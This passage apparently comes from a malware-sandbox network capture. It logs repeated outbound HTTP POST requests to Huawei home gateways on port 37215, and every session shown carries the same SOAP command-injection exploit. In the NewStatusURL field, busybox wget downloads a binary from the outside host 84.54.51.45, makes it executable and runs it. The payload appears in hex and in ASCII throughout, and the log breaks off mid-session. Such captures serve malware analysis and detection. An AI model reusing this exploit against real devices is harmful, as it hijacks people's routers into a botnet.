68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            790192.168.2.154813841.205.70.5137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740298986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            791192.168.2.154756841.114.242.1637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740331888 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            792192.168.2.153642641.200.160.10637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740375042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            793192.168.2.155941641.5.235.22137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740377903 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            794192.168.2.155013841.81.154.18337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740379095 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            795192.168.2.155464041.67.86.4237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740411043 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            796192.168.2.154870041.253.97.16137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740449905 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            797192.168.2.153601641.234.32.15737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740451097 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            798192.168.2.154124041.119.197.17237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740478992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            799192.168.2.155552441.92.129.337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740510941 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            800192.168.2.153740641.85.227.19837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740530968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
